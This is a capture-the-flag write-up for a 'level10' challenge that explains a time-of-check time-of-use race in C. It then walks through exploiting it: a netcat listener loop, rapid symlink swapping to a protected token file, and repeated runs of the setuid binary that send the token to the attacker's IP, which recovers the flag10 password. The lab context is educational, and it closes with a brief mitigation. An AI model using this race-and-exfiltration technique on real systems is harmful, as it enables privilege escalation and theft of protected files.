Level10 introduces the Time-of-check Time-of-use (TOCTOU) vulnerability, well described in the CWE website.
What you’ll need to know…
- C
Level10
I’ll quickly explain the TOCTOU vulnerability using a simple example. Consider the following lines of code.
if(!access(abc_file, W_OK)){
fp = fopen(abc_file, "w+");
write(fp, "moveax", sizeof("moveax"));
}
else{
fprintf(stderr, "Sorry, but you don't have permissions to write to this file!\n");
}
It’s a simple piece of code, it checks if you have access to the file abc_file. If you do, it’ll open this file and write moveax and if you don’t, it will print a message to stderr. So, the “time of check” is the first line and the “time of use” is the second one.
Now, imagine that a user with malicious intents, starts with creating a symbolic link to an important file (passwd maybe) infinitely and parallel to the execution of the code displayed above. If the creation of this symbolic link happens between the first two lines: JACKPOT! One note: for sure, many of the attempts to create the symbolic link will fail because happened before the if clause. You’ll see this while we solve this level10 challenge.
First of all, let’s put netcat listening. You can do this in the same VM or another, running while true; do nc -lv 18211; done (Linux) or FOR /L %N IN () DO nc -lvp 18211 (Windows).
Second, we need to create a fake token. Next, we need to create a symbolic link in our home that points to the fake token and alternate this symbolic link with one that points to the real token into the flag10 home directory. Important note: we need to do this repeatedly so we can have the instructions executed in the order presented below.
Ideal instructions order’s
ln -sf /tmp/sometoken /home/level10/token;
if(access(argv[1], R_OK) == 0) {
...
ln -sf /home/flag10/token /home/level10/token;
...
ffd = open(file, O_RDONLY);
Now, we just need to keep sending the file through netcat. Finally, run while true; do /home/flag10/flag10 /home/level10/token <your IP>; done in order to achieve this.
The following image shows the commands that I executed in order to read the token file.
After this point, you can notice two files in the home directory, the symbolic link and the output_level10 file.
If you go ahead and read the output_level10 file you’ll find there the password of flag10 account.
Notice that there are a lot of failed tries as I told you.
Let’s now try to login into the flag10 account…
There you go. Challenge level10 solved!
Challenges completed: 11/20
Mitigation
TOCTOU race conditions are hard to eliminate. One way of avoiding them is to use file descriptors throughout functions like fstat and don’t use functions like access.